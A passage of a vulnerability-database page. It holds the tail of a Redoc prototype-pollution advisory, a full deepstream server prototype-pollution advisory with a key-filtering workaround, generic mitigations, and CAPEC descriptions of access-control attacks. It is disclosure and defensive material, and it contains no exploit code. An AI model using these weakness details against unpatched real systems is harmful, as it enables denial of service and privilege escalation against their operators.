"details": "A prototype pollution in the component Module.mergeObjects (redoc/bundles/redoc.lib.js:2) of redoc \u003c= 2.2.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
"id": "GHSA-9rhg-254w-fh9x",
"modified": "2025-03-31T15:58:51Z",
"published": "2025-03-28T21:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57083"
},
{
"type": "WEB",
"url": "https://github.com/Redocly/redoc/issues/2499"
},
{
"type": "WEB",
"url": "https://github.com/Redocly/redoc/pull/2638"
},
{
"type": "PACKAGE",
"url": "https://github.com/Redocly/redoc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Redoc Prototype Pollution via `Module.mergeObjects` Component"
}
GHSA-9V98-6G37-X9G6
Vulnerability from github – Published: 2026-06-26 21:03 – Updated: 2026-06-26 21:03Impact
Prototype pollution in deepstream server v <=10.0.4. Potential privilege escalation from any authenticated user with write permission to any record.
Patches
Yes, upgrade to v10.0.5
Workarounds
Filter out all messages containing the path __proto__, constructor, prototype, before they reach the server's message pipeline
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@deepstream/server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-49252"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T21:03:59Z",
"nvd_published_at": "2026-06-18T21:16:29Z",
"severity": "CRITICAL"
},
"details": "### Impact\nPrototype pollution in deepstream server v \u003c=10.0.4. Potential privilege escalation from any authenticated user with write permission to any record.\n\n### Patches\nYes, upgrade to v10.0.5\n\n### Workarounds\nFilter out all messages containing the path `__proto__`, `constructor`, `prototype`, **before they reach the server\u0027s message pipeline**",
"id": "GHSA-9v98-6g37-x9g6",
"modified": "2026-06-26T21:03:59Z",
"published": "2026-06-26T21:03:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/deepstreamIO/deepstream.io/security/advisories/GHSA-9v98-6g37-x9g6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49252"
},
{
"type": "WEB",
"url": "https://github.com/deepstreamIO/deepstream.io/commit/54b8e2958a98df444b5b5d9a66e22872afd84e44"
},
{
"type": "PACKAGE",
"url": "https://github.com/deepstreamIO/deepstream.io"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "deepstream is vulnerable to prototype pollution"
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.